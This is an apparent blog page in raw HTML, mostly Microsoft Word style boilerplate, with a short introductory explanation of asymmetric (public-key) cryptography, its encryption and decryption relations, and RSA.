UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";}
</style>
<![endif]-->
<!--StartFragment-->
</span></div>
<h1>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif; font-size: large;">Asymmetric
Cryptography<o:p></o:p></span></h1>
<span lang="EN-GB"><span style="font-family: Times, Times New Roman, serif; font-size: large;">
</span></span><br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">Asymmetric Cryptography
also known as Public key cryptography is a cryptographic category which
involves the use of asymmetric cryptographic key algorithms.</span><span style="font-family: Times, 'Times New Roman', serif;">The asymmetric key
algorithms are used to create a </span><b style="font-family: Times, 'Times New Roman', serif;">mathematically
related key pair: a secret private key and a published public key.</b><span style="font-family: Times, 'Times New Roman', serif;"> [6]</span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span style="font-family: Times, 'Times New Roman', serif;">The following simple
mathematical relationships can describe the relation between decryption and
encryption in Asymmetric Cryptography.</span><br />
<span style="color: red; font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="color: red; font-family: Times, 'Times New Roman', serif;">Encryption ( k1 ,
Plaintext ) = Cipher (4)</span><br />
<span style="color: red; font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="color: red; font-family: Times, 'Times New Roman', serif;">Decryption ( k2 ,
Cipher ) = Plaintext (5)</span><br />
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="font-family: Times, 'Times New Roman', serif;">Where k2 a secret non
shared value, k1 a non secret shared value and Plaintext the data input we want
to convert into cipher. From relationships (4) and (5) we can conclude that:</span><br />
<span style="color: red; font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="color: red; font-family: Times, 'Times New Roman', serif;">Plaintext = Decryption
( k2 , Cipher ) = Decryption ( k2 , Encryption ( k1 , Plaintext )) (6)</span><br />
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="font-family: Times, 'Times New Roman', serif;">In relationship we can
realize that the decryption of the Plaintext is a more complex relationship
that is dependents to both keys to be used.Public key cryptography
is used widely. It is the approach which is employed by most cryptosystems. It
underlies such Internet standards as Transport Layer Security (TLS), PGP, and
GPG.The most famous
asymmetric algorithm is RSA. In cryptography, RSA (which stands for Rivest,
Shamir and Adleman who first publicly described it) is an algorithm for
public-key cryptography. RSA is widely used in electronic commerce, and is
believed to be secure when proper secret keys are used.</span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><o:p></o:p></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-Z7Vy6wF45I6nDWdSJp8lf17WSlCqzJLEObfw5XPkNrjVtHO4bFDETKdeZtQgrRXb7JJ2KDbfbSC5RXZuR2QdLFxVzBCEx24TWe1rb0qnd7DhwMjusPnxRu9mLOFzSzaGAI9FHIXKJwo/s1600/c3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-Z7Vy6wF45I6nDWdSJp8lf17WSlCqzJLEObfw5XPkNrjVtHO4bFDETKdeZtQgrRXb7JJ2KDbfbSC5RXZuR2QdLFxVzBCEx24TWe1rb0qnd7DhwMjusPnxRu9mLOFzSzaGAI9FHIXKJwo/s1600/c3.png" /></a></span></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
</span>
<br />
<div class="MsoNormal">
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Revision>0</o:Revision>
<o:TotalTime>0</o:TotalTime>
<o:Pages>1</o:Pages>
<o:Words>5</o:Words>
<o:Characters>34</o:Characters>
<o:Company>Lamehacker</o:Company>
<o:Lines>1</o:Lines>
<o:Paragraphs>1</o:Paragraphs>
<o:CharactersWithSpaces>38</o:CharactersWithSpaces>
<o:Version>14.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>JA</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="276">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="0" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
